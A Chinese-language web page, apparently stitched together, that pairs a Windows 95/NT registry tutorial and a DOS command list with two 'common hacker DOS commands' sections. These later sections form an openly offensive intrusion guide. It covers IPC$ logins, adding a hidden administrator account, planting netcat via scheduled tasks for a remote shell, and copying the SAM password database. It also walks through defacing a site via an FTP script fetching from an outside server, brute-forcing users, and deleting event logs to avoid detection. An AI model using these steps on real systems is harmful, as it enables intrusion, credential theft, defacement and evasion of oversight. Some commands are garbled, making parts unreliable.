HKEY_CLASSES_ROOT其實就是HKEY_LOCAL_MACHINE\SOFTWARE\Classes,但是在HKEY_CLASSES_ROOT窗編輯相對來說顯得更容易和有條理。
HKEY_USERS保存著預設用戶信息和當前登陸用戶信息。當一個域成員計算機啟動並且一個用戶登陸,域控制器自動將信息發送到HKEY_CURRENT_USER里,而且HKEY_CURRENT_USER信息被映射到系統內存中。其他用戶的信息並不發送到系統,而是記錄在域控制器里。
鍵和子鍵
數據被分割成多層次的鍵和子鍵,建立分層次(就象Exploer一樣)結構更易於編輯。每個鍵有成組的信息而且根據在其中的數據類型被命名。每個鍵在它的文件夾圖標上都有一個加號(+)標志子鍵說明在它下面還有更多內容的東西。當點開它的時候,文件夾的加號標志被替換成一個減號(-)標志,然後顯示出下一級的子鍵。
所有軟體,硬體,windows工作的設置都存放在HKEY_LOCAL_MACHINE。所有安全策略,用戶許可權和共享信息也包括在這個鍵中。用戶許可權,安全策略,共享信息可以通過Windows NT域用戶管理器,Explorer和Win95中控制面板來設置。
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT包含了所有應用程序運行時必需的信息:
在文件和應用程序之間所有的擴展名和關聯;
所有的驅動程序名稱;
類的ID數字(所要存取項的名字用數字來代替);
DDE和OLE的信息;
用於應用程序和文件的圖標;
HKEY_CURRENT_CONFIG.
HKEY_CURRENT_CONFIG是在HKEY_LOCAL_MACHINE中當前硬體配置信息的映射。如果系統只有一個配置文件,也就是原始配置,數據將一直在同樣的地方。在控制面板|系統|硬體配置文件|創建一個額外的配置使額外配置信息放入HKEY_LOCAL_MACHINE。當Win95中存在多個配置文件時,當每次計算機啟動時將給出一個提示讓你選擇一個配置文件。在Winnt中,在啟動時你可以按空格鍵來選擇上次正常啟動時硬體配置文件。根據硬體配置文件選擇的不同,特定的信息被映射到HKEY_CURRENT_CONFIG。
HKEY_DYN_DATA
HKEY_DYN_DATA和其他的注冊表控制鍵不同,因為實際上它並不被寫入硬碟驅動器中。Win95的一個優點是,在系統啟動時HKEY_DYN_DATA這個控制鍵儲存收集到的即插即用信息並配置它們。它保存在內存中,Win95用它來控制硬體。因為是在內存中,所以它不從硬碟中讀取,每次當你啟動計算機時,配置都有可能會不一樣。在啟動時Win95必須計算超過1600種可能的配置。所以,如果系統改變既定的設置而沒有報告給Win95那麼潛在的問題就可能發生。系統大多數時間工作良好,但是並非一直如此。
HKEY_USERS
HKEY_USERS僅包含了預設用戶設置和登陸用戶的信息。雖然它包含了所有獨立用戶的設置,但在用戶未登陸網路時用戶的設置是不可用的。這些設置告訴系統哪些圖標會被使用,什麼組可用,哪個開始菜單可用,哪些顏色和字體可用,和控制面板上什麼選項和設置可用。
HKEY_CURRENT_USER
用來保存當前用戶和預設用戶的信息,HKEY_CURRENT_USER僅映射當前登陸用戶的信息。
各主鍵的簡單介紹
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE是一個顯示控制系統和軟體的處理鍵。HKLM鍵保存著計算機的系統信息。它包括網路和硬體上所有的軟體設置。(比如文件的位置,注冊和未注冊的狀態,版本號等等)這些設置和用戶無關,因為這些設置是針對使用這個系統的所有用戶的。
HKEY_LOCAL_MACHINE\AppEvents
為了以後在瘦客戶機上運行客戶機/伺服器這樣的應用程序,在Win95/98中AppEvents鍵是空的。應用程序實際上都駐留網路伺服器上,這些鍵會保存部分指針。
HKEY_LOCAL_MACHINE\Config
這個鍵保存著你計算機上所有不同的硬體設置(這些從控制面板的系統屬性中硬體配置文件中可以創建)。這些配置在啟動時通常被復制到HKCC。每個配置會被用一個鍵(比如0001或者0002等等)來保存,每個都是一個獨立的配置。如果你只有一個單一的配置,那就只會有0001這個鍵
HKEY_LOCAL_MACHINE\Config\0001\Display
這個鍵表示顯示的設置,如熒屏字體,窗體大小,窗體位置和解析度等
一個小技巧:當設置了計算機不支持的大解析度導致Windows不能啟動時(黑屏),可以修改解析度來解決。進入安全模式,運行regedit.exe,在這個鍵的Resolution鍵值中把數據值修改為640,480或者800,600這樣的低解析度,然後重新啟動計算機即可。
HKEY_LOCAL_MACHINE\Config\0001\System
這個鍵保存著系統里列印機的信息
HKEY_LOCAL_MACHINE\Config\0001\System\CurrentControlSet\Control\Print\Printers
在這個鍵下面,有一個鍵是為系統上每一個列印機設置的,通過控制面板添加和刪除列印機會調整這個列表
HKEY_LOCAL_MACHINE\Enum
Enum鍵包含啟動時發現的硬體設備和那些既插即用卡的信息。Win95使用匯流排列舉在啟動時通過不同的.ini文件來檢測硬體信息。那些在啟動時被安裝的和被檢測到的硬體會顯示在這里。子鍵包括BIOS, ESDI, FLOP, HTREE, ISAPNP, Monitor, Network, Root, SCSI, 和 VIRTUAL。子鍵名表示它們各自的硬體設備信息。
HKEY_LOCAL_MACHINE\Enum\BIOS
BIOS鍵保存著系統中所有即插即用設備的信息。它們用一套代碼數列出,包括每一個鍵的詳細說明,舉例,*pnp0400是並行口LPT1的鍵。如果LPT1並不具備即插即用功能,它就會別列入到Enum下的Root鍵中
HKEY_LOCAL_MACHINE\Enum\Root
Root鍵包括所有非即插即用設備的信息。在這里,我們可以迅速斷定哪些設備是即插即用,那些不是。比如SCSI適配器,這個設備必須符合Win95中一個鍵名為ForcedConfig的硬體設置,這個不會改變。
HKEY_LOCAL_MACHINE\Enum\Network
win95的網路功能在這個鍵有詳細說明,子鍵包括了每個已經安裝的主要的服務和協議。
HKEY_LOCAL_MACHINE\HARDWARE
hardware子鍵包括了兩個多層的子鍵:DESCRIPTION鍵,它包含了中央處理器和一個浮點處理器的信息。還有一個設備映射鍵,它下面的串列鍵列出你所有的com埠。這個hardware鍵僅保存超級終端程序的信息,及數學處理器和串列口。
HKEY_LOCAL_MACHINE\Network
這個鍵僅保存網路登陸信息。所有網路服務細節都保存在HKEY_LOCAL_MACHINE\Enum\Network這個鍵中。這個鍵有一個子鍵,logon,包括了lmlogon(本地機器登陸?0=false 1=true)的值,logonvalidated(必須登陸驗證),策略處理,主登陸方式(Windows登陸 ,微軟網路客戶方式等),用戶名和用戶配置。
HKEY_LOCAL_MACHINE\SECURITY
security 有兩個子鍵,第一個是存取(它最終致使一個遠程鍵列出網路安全資源,存取許可權等)和提供(包括列出網路地址和地址伺服器),這個鍵被保留用在以後使用高級安全功能和NT兼容性上
HKEY_LOCAL_MACHINE\SOFTWARE
這個鍵列出了所有已安裝的32位軟體和程序的.ini文件。它包括了變化,依靠軟體安裝。那些程序的控制功能在這里的子鍵中列出。多數子鍵簡單的列出了安裝軟體的版本號。
我們在\Microsoft\Windows\Current Version下發現了一些有意思的設置,它有如下子鍵:
1.App paths: 你曾經安裝過的所有32位軟體的位置。
2.Applets, Compression, Controls Folder : 包括下控制面板象顯示屬性那樣屬性條的附件。
3.Detect, explorer :很多有意思的子鍵如Namespace keys of Desktop和My Computer----它們指出了回收站和撥號網路的CLSID行----和提示子鍵可以讓你建立自己的提示。
4.Extensions : 一個擴展聯系的列表,當前相關聯的擴展名和比特定的執行文件更適合的目標類型。
5.Fonts, fontsize, FS Templates :系統屬性條中所選擇文件系統模板, 伺服器,桌面計算機或者筆記本電腦信息。
6.MS-DOS Emulation :包括一個應用程序兼容子鍵 為大量過時的程序二進制鍵所設。
7.MS-DOS Options :在dos模式下的設置,如himem.sys,cd-roms等。
8.Network :網路驅動的配置。
9.Nls, Policies :系統管理員認為你不應該去做的事。
10.ProfileList :所有可以登陸你計算機的用戶名列表。
11.在Windows啟動時運行的程序的神秘之處是它們並不在開始菜單的啟動文件夾中。它們在HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\下的子鍵中被執行。
Run : 程序在啟動時運行
RunOnce : windows初始化時程序在啟動時只運行一次,這個經常用在當安裝軟體之後需要重新啟動系統的時候,所以這個鍵一般都是空的。
RunServices : 它就象Run一樣,但是包含了「服務」,它不象一般的程序它們是比較重要的或者是「系統」程序。但是它們不是VXDs,就象McAfee或者RegServ工作一樣。
RunServicesOnce : 它只運行一次,但是是「系統自身」的安裝(大量的windows安裝參數:通常鍵值包括了系統目錄位置,和win95更新,可選項安裝組件,和windows啟動目錄的子鍵。
注意:在很多黑客木馬軟體中,常常在這里添加鍵值(一般是在Run中),這樣使得木馬軟體可以隨著windows啟動而啟動並且很隱秘。在這里可以查看不正常的啟動項和去掉無用的運行程序(比如我就很不喜歡超級解霸的自動伺服器,在這里可以去掉它)。
12.SharedDLLs:共享DLL的列表,每一個都給出了在一個不可知系統的一個數字等級。
13.Shell Extensions:列出了「被認可的」OLE注冊條,和相應的CLSID連接。
14.ShellScrap :這個包含了一個PriorityCacheformats的子鍵,它包括了一個空的有限值,它更象過去SmartDrive命令行參數的派生。
15.Time Zones : 主鍵值是你現在的時區;子鍵定義了所以可能的時區。
16.Uninstall:這個保存了程序在添加/刪除程序對話框的顯示;子鍵包含了指向反安裝程序的路徑。和安裝向導相似.......)winlogon(包含了合法登陸布告的文本句)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
這個子鍵包括設備驅動和其他服務的描述和控制。不同於windows nt,win95隻包括限制驅動的控制設置信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
這個子鍵包括了win95控制面板中的信息。不要編輯這些信息,因為一些小程序的改變在很多地方,一個丟失的項會使這個系統變的不穩定
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
這個鍵包括了所有win95的標准服務。所有被添加的服務和設備,每個標準的服務鍵包括了它的設置和辨認設置。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Arbitrators
atbitrators鍵包括了當兩個設備共同佔用同樣的設置需要解決的信息。四個子鍵包括了內存地址,沖突,DMA,I/O埠沖突和IRQ沖突。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Class
class鍵包括了所有win95支持的設備classes控制,這些和你在添加新硬體出現的硬體組很類似,還包括了這些設備如何安裝的信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\inetaccs
這個鍵包括了關於這個系統變化的ie附件的可用性,它僅在你安裝過ie2。0或者更高版本才出現。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSNP32
msnp32描述了客戶機如何在microsoft網路中實現功能,它包括了認證過程和認證者的信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NWNP32
nenp32鍵描述了windows客戶如何在netware網路中工作功能,它包括了關於認證過程和證明者的信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess
在這個鍵里包括需要遠程工作在win95系統上的信息,有認證參數,主機信息,和為了建立一個撥號連接工作的協議信息。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP
這個鍵包括了所以snmp(簡單網路管理協議)的參數。它包括了允許的管理,配置陷阱,和有效的團體。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VxD
vxd鍵包括了win95中所有32位虛擬設備驅動信息,win95自動管理它們,所以不必要用注冊表編輯器編輯它們,所以的靜態vxds用子鍵列出。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WebPost
webpost鍵包括了所有裝載的internet郵局的設置,如果你連接一個isp,並且它列出載這里,你應該給自己選則一個伺服器。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock
這個鍵列出了當連接到internet上winnsock文件的信息,如果列出了不正確的文件,你將不會連接上internet。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinTrust
wintrust功能是檢查從Internet上下載來的文件是否有病毒,它可以確保你得到干凈安全的文件。
HKEY_CLASSES_ROOT
在注冊表中HKEY_CLASSES_ROOT是系統中控制所有數據文件的項。這個在Win95和Winnt中是相通的。HKEY_CLASSES_ROOT控制鍵包括了所有文件擴展和所有和執行文件相關的文件。它同樣也決定了當一個文件被雙擊時起反應的相關應用程序。
HKEY_CLASSES_ROOT被用作程序員在安裝軟體時方便的發送信息,在Win95和Winnt中,HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINE\Software\Classes是相同的。程序員在運行他們的啟動程序時不需要擔憂實際的位置,相反的,他們只需要在HKEY_CLASSES_ROOT中加入數據就可以了。
在Windows用戶圖形界面下,每件事----每個文件,每個目錄,每個小程序,每個連接,每個驅動---都被看做一個對象;每個對象都有確定的屬性和它聯系。HKCR包含著對象類型和它們屬性的列表。HKCR主要的功能被設置為:
一個對象類型和一個文件擴展名關聯
一個對象類型和一種圖標關聯
一個對象類型和一個命令行動作的關聯
定義對象類型相關菜單選項和定義每一個對象類型屬性選項
在Win95中,相關菜單就是當你滑鼠右擊一個對象時所彈出的菜單;屬性就是當你選擇屬性項後一個展開的對話框。用簡單術語來說就是在改變HKCR中的設置可以改變一個給定文件擴展名預設的關聯。改變一個文件類型的預設圖標,和添加或者刪除給定對象類型的彈出菜單內容(或者所有的對象類型)
HKCR包括了三種基本類型的子鍵
\??? 或者文件擴展名子鍵
文件擴展名子鍵在彈出菜單上連接文件擴展名到對象類型和相關操作,屬性項,和相關操作。
\object 類型子鍵
對象類型子鍵定義了一個對象類型在它預設圖標的項,它的彈出菜單和屬性項,它的相關操作和它的CLSID連接。
\CLSID 子鍵
在Windows下每件事都被用一個數字取代它的名字來對待。就象人往往是用名字來處理事情一樣。CLSID是標識所有列出的圖標,應用程序,目錄,文件類型等等對象的數字。是微軟為製造商分配的,每一個都必須是唯一的。製造商將CLSID放入安裝程序文件這樣就可以在安裝時更新注冊表。
注冊表是應用程序進行時它們需要關於做什麼的指示的資料庫。比如說,假定你有一個微軟Excel 7電子數據表的Word 7文檔,當你在Word中雙擊這個電子數據表,應用程序菜單就會變成Excel的菜單而且電子數據表進入編輯狀態,就好象你在Excel中一樣。它是如何知道該做什麼呢?每個Excel 7創建的文件都有Excel的CLSID連接。Word讀這個CLSID後,到注冊表中尋找指示,依賴CLSID下的數據運行.DLL文件或者應用程序。
CLSID子鍵為對象類型提供了OLE和DDE信息和圖標。相關菜單,或者包含在它子鍵中的屬性項信息。這個可能是多數讓人看到後覺得「恐怖」的鍵。每個CLSID數必須是唯一的,實際上,為了這個目的微軟已經出產了CLSID-產生程序--這個結果導致你往往得到32位16進制的數字串,除非你是程序員,否則多數部分鍵看起來是很枯燥的。它們包括內存管理模式,客戶機/伺服器配置,和OLE處理的.dll連接。
關於子鍵的一點註解
1)shell:Shell鍵有個一」action「子鍵,如同」open「一樣,這里有一個command子鍵;command子鍵有一個預設句值,它包含了運行程序的命令行。將一個」open「子鍵放在一個對象類型的shell子鍵中會在這個對象類型的彈出菜單上多出一個」open「選項,給這個open子鍵一個command(預設命令行"C:\Windows \Notepad.exe %1")子鍵會使得打開這個對象類型時使用筆記本做為預設應用程序。其他操作選項包括View,Print,Copy,Virus,Scan等等。
2)shellex:Shellex鍵有一個子鍵。它們包含的每一個子鍵指向一個為對象類型執行OLE和DDE功能的CLSID項(比如說快速查看,一個菜單處理子鍵下指向一個有句值的CLSID鍵列出了包含了文件瀏覽功能的.dll文件)
3)shellnew:ShellNew包含了一個「command」句,它包含了一個打開對象類型「新」文件的命令行。
4)DefaultIcon:DefaultIcon子鍵包含了一個「default」句,?/ca>
⑶ 誰有DOS命令的解釋哦.
ATTRIB 文件屬性(顯示或改變屬性)
CHDIR(CD) 改變目錄
CHKDSK 檢查磁碟
CHOICE 提示擊鍵輸入
CLS 清屏幕
COMMAND 重新載入MS-DOS程序
COPY 復制文件
DATE 設置顯示日期
DEBUG 調試程序
DEFRAG 清除磁碟碎片
DEL(ERASE) 刪除文件
DELOLDOS 刪除舊DOS文件
DELTREE 刪除目錄樹分支
DIR 顯示目錄
DISKCOMP 比較軟盤內容
DISKCOPY 復制磁碟
DOS 擴展擴充內存管理
DOSSHELL DOS外層
DRIVPARM 定義驅動器參數
EDIT 編輯器
EMM386 內存管理
ERASE 刪除文件
DBLSPACE 磁碟壓縮
EXPAND 釋放壓縮
FASTHELP 快速求助
FC 文件比較
FDISK 磁碟分區
FIND 搜尋指定字串
FOR 循環執行命令
FORMAT 格式化磁碟
MEM 內存使用情況顯示
MKDIR(MD) 建立子目錄
MSAV 檢查和清除病毒
MSBACKUP 磁碟文件務份
PATH 設置搜索路徑
PAUSE 暫停執行命令
RESTORE 磁碟文件轉儲
RENAME(REN) 文件重新命名
RMDIR(RD) 刪除目錄
SCANDISK 檢查磁碟
SYS 傳送系統文件
TIME 設置顯示時間
TREE 顯示目錄結構
TYPE 顯示文件內容
UNDELETE 恢復被刪除文件
VER 顯示系統版本號
VOL 顯示卷標
VSAFE 病毒檢查
XCOPY 復制組文件
APPEND 補充路徑
BREAK 檢查控制中斷
BUFFERS 設置磁碟緩沖區數
CALL 調用批文件
CHCP 轉換碼頁
COUNTRY 確定國家標准貨幣
CTTY 改變控制台
DEVICE 安裝設備驅動程序
DEVICEHIGH 裝載設備驅動程序
ECHO 命令顯示開關
FASTOPEN 快速載入文件
FCBS 使用文件控制塊
FILES 同時打開文件數
GOTO 轉向分支
GRAPHICS 圖形屏幕列印
HELP 求助
IF 設定條件
INCLUDE 簡化多重配置塊
INSTALL 安裝常駐程序
INTERLNK 計算機互連
INTERSVR 與伺服器互連
KEYB 裝載字元轉換表
LABEL 卷標
LASTDRIVE 置最大驅動器數
LOADFIX 裝入固定內存
LOADHIGH(LH) 高內存程序裝載
MEMMAKER 檢查內存
MENUCOLOR 設置顯示選項
MODE 設置硬體工作方式
MSCDEX 訪問CD驅動器
MSO 檢查系統配置
NLSFUNC 支持各國語言
NUMLOCK 控制NUMLOCK鍵
POWER 節省電能
PRINT 後台列印
PROMPT 改變系統提示
QBASIC 啟動QB
REM 注釋信息
REPLACE 替換文件
SET 設置環境變數
SETUP 安裝DOS6。2文件
SETVER 改變DOS版本表
SHARE 網路文件共享
SHELL 裝載命令處理程序
SMARTDRV 磁碟緩沖
SORT 文件排序
STACKS 支持動態使用的數據線
SUBMENU 菜單項(配置CONFIG。SYS)
SUBST 設置虛擬驅動器
SWITCHES 鍵盤開關
VRIFY 磁碟檢驗
》:建立子目錄命令 MD (內部命令)
功能:在指定盤的指定目錄下建立一個子目錄
格式:MD [盤符][路徑]子目錄名
注意:1。不能建立根目錄與目標目錄下已經存在的目錄
2。預設路徑時則表示在當前目錄下建立
2》:改變當前目錄目錄命令: CD (內部命令)
功能:設置指定盤的當前目錄
格式:CD [盤符][路徑]
注意:CD 表示顯示當前目錄
CD..表示退回到根目錄
CD/ 表示退回到上一級目錄
3》:刪除子目錄命令:RD (內部命令)
功能: 從指定的盤符上刪除子目錄
格式: CD [盤符][路徑]子目錄名
注意:1。要刪除的目錄必須為空目錄,如果不為空目錄,先來到該目錄,用 DEL *.*刪除該目錄下的所有內容
再回到上一級目錄,用RD命令刪除該目錄
2。不能刪除當前目錄與根目錄
4》:列文件目錄命令:DIR (內部命令)
功能:顯示指定盤、指定目錄下所包含的文件與下一級子目錄的有關信息
格式:DIR [盤符][路徑][文件名][/P][/W]
[/P]表示分屏顯示
[/W]表示壓縮顯示
5》:顯示全盤目錄命令:TREE (外部命令)
功能:顯示指定盤的目錄結構
格式:[盤符][路徑]TREE [盤符1][/F]
[/F]表示列出各級子目錄的文件名
6》:設置查找目標命令PATH (內部命令)
功能:設置外部文件的查找目錄
格式: PATH [盤符][路徑][;盤符][路徑]……
注意:1。顯示上次PATH命令設置的查找文件目錄命令用:
PATH
2。刪除上次PATH命令設置的文件查找目錄用:
PATH;
7》:刪除目錄命令:DELTREE
功能:將整個目錄及其子目錄和文件全部刪除
格式:DELLTREE [盤符][路徑]目標文件
注意:全部刪除、不論是否系統、隱藏、還是只讀
黑客常用dos命令(轉)
一般黑客入侵所需要的幾個常用命令
1:NET
只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧!
這里我們假如你得到的用戶是hbx,密碼是123456。假設對方IP為127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必須登陸後才可以用.登陸的方法就在上面.
----------------------
下面我們講怎麼創建一個用戶,由於SA的許可權相當於系統的超級用戶.
我們加一個hei的用戶密碼為lovechina
net user hei lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了.
net localgroup Administrators hei /add
----------------------
這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這里把對方的C盤映射到本地的Z盤.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這里是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?不知道是否這樣,我的2000就是刪除不了它。
net user guest /active:yes
----------------------
這里是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,其他用戶也可以的。只要有許可權就行了呀!
net user guest lovechina
net命令果然強大啊!
2:at
一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?
那麼需要用AT命令,這里假設你已經登陸了那個伺服器。
你首先要得到對方的時間,
net time \\127.0.0.1
將會返回一個時間,這里假設時間為12:1,現在需要新建一個作業,其ID=1
at \\127.0.0.1 12:3 nc.exe
這里假設了一個木馬,名為NC.EXE,這個東西要在對方伺服器上.
這里介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它是一個TELNET服務,埠為99.
等到了12:3就可以連接到對方的99埠.這樣就給對方種下了木馬.
3:telnet
這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的埠.
telnet 127.0.0.1 99
這樣就可以連到對方的99埠.那你就可以在對方運行命令了,這個也就是肉雞.
4:ftp
它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空間,國內多的是,如果真的找不到,我給個www.51.NET,不錯的.當我們申請完後,它會給用戶名,密碼,以及FTP伺服器.
在上傳前需要登陸先,這里我們假設FTP伺服器是www.51.NET,用戶名是HUCJS,密碼是654321
ftp www.51.net
他會要求輸入用戶,成功後會要求輸入密碼.
----------------------
下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\
get c:\index.htm d:\
假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下
put c:\index.htm d:\
5:
下面我說說怎樣把本地的文件復制到對方硬碟上去,需要建立好IPC$連接才有效。
這里我們把本地C盤下的index.htm復制到127.0.0.1的C盤下
index.htm \\127.0.0.1\c$\index.htm
----------------------
如果你要復制到D盤下把C改為D,就行了!
index.htm \\127.0.0.1\d$\index.htm
----------------------
如果你要把他復制到WINNT目錄里
就要把輸入
index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt
----------------------
要把對方的文件復制過來,順便告訴大家NT的備份的資料庫放在x:\winnt\repair\sam._ sam._是資料庫的文件名
下面就把127.0.0.1的資料庫復制到本地C盤下
\\127.0.0.1\admin$\repair\sam._ c:\
----------------------
6:set
如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才准有),當然他的80埠要開,不然你黑給誰看。這時需要用SET命令!
下面是我得到的結果!我來分析它,只是找主頁在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登陸者的IP,這里本來是顯示我的IP,被我刪除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主頁放在的地址,只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉紅色的那行就是對方主頁存放地址,這里告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名,這樣只要看到和XX.XX.XX.XX看到的也面一模一樣,那麼這就是主頁的名稱了。
7:nbtstat
如果你掃到一部NT的機子,他的136到139其中一個埠開了的話,就要用這個命令得到用戶了。順便告訴大家這是netbios,得到用戶名後就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都試下,不行就暴力破解吧!
現在網上很多NT的機子都開了這些埠的,你可以練習下,我們來分析得到的結果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大寫哦。
下面是得到的結果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉紅色的就是登陸過這部系統的用戶,可能你不知道怎麼看,大家是不是看到了一竄數字,只要這竄數字是<03>的話,那他前面的就是用戶。
這里的用戶是PENTIUMII。
8:Shutdown
關了對方的NT伺服器的命令
Shutdown \\IP地址 t:20
20秒後將NT自動關閉,三思後才能運行這個命令,這樣對對方造很大的損失,要做個有良心的入侵者呀。
9:DIR
這個命令沒什麼好講,但是卻非常重要,他是查看一目錄里的所有文件、文件夾。
你可以本地試下。
10:echo
著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主機。
我們假設我們要把「反獨裁,反一黨制!」寫入index.htm,有2種方法,大家看看有什麼區別。
echo 反獨裁,反一黨制!>index.htm
echo 反獨裁,反一黨制!>>index.htm
第一個的意思是覆蓋index.htm原有的內容,把「反獨裁,反一黨制!」寫進index.htm。
第二個的意思是把「反獨裁,反一黨制!」加到index.htm裡面。
「>>」產生的內容將追加進文件中,「>」則將原文件內容覆蓋。
大家可以本地試下。
可能你會問,這樣簡單黑下有什麼好玩的,其實他可以用來下載主頁到對方的目錄里。
1、首先,我們需要申請一個免費的主頁空間。
2、用echo在可寫目錄下建立如下內容的txt文件:(以chinren伺服器為例。)
open upload.chinaren.com(你的FTP伺服器,申請時你的空間提供商會給你的)
cnhack(你申請時的用戶名)
test(你申請時的密碼)
get index.htm c:\inetpub\wwwroot\index.htm(這里是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP對話,相當在98下的DOS,用EXIT退出DOS)
具體的做法:
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最後輸入 ftp -s:c:\cnhack.txt (利用ftp的-s參數,執行文件里的內容。)
等命令完成時,文件已經下載到你指定的文件里了。
注意:取得文件後,請刪除cnhack.txt。(如果不刪除,很容易會給別人看到你的密碼。)
記得要 del c:\cnhack.txt
11:attrib
這個命令是設置文件屬性的。如果你想黑一個站,而他的主頁的文件屬性設置了只讀,那就很可憐呀,想刪除他也不行,想覆蓋他也不行。倒!不過有這個命令就別怕了。
attrib -r index.htm
這個命令是把index.htm的只讀屬性去掉。
如果把「-」改為「+」則是把這個文件的屬性設置為只讀
----------------------
attrib +r index.htm
這個命令是把index.htm的屬性設置為只讀。
12:del
當你看到這個標題可別倒下啊!現在要離開127.0.0.1了,要刪除日誌,當然要刪除日誌啦!想被捉嗎。呵呵。
NT的日誌有這些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要刪除這些就可以了。有些系統NT安裝在D盤或其他盤,就要把C改成其他盤。
黑客常用dos命令2
建立一個空連接
命令:net use \\192.168.0.198\ipc$ "" /user:"administrator"
查看遠程主機的共享資源
命令:net view \\ip
查看遠程主機的當前時間
命令: net time \\ip
得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
命令:nbtstat -A ip
刪除連接:
net use \\127.0.0.1\ipc$ /del
映射/刪除遠程共享:
net use z: \\127.0.0.1\c
向遠程主機復制文件:
路徑\文件名 \\IP\共享目錄名,如:
d:\3389.exe \\IP\c$ 即將d盤下的3389.exe復制到對方c盤內
把遠程主機上的文件復制到自己的機器里:
\\127.0.0.1\c$\xinxin.exe c:\
遠程添加計劃任務:
at \\IP 時間 程序名 如:
at \\IP 11:00 3389.exe
1)查看本地主機的共享資源(可以看到本地的默認共享)
net share
2)得到本地主機的用戶列表
net user
3)顯示本地某用戶的帳戶信息
net user 帳戶名
4)顯示本地主機當前啟動的服務
net start
5)啟動/關閉本地服務
net start 服務名
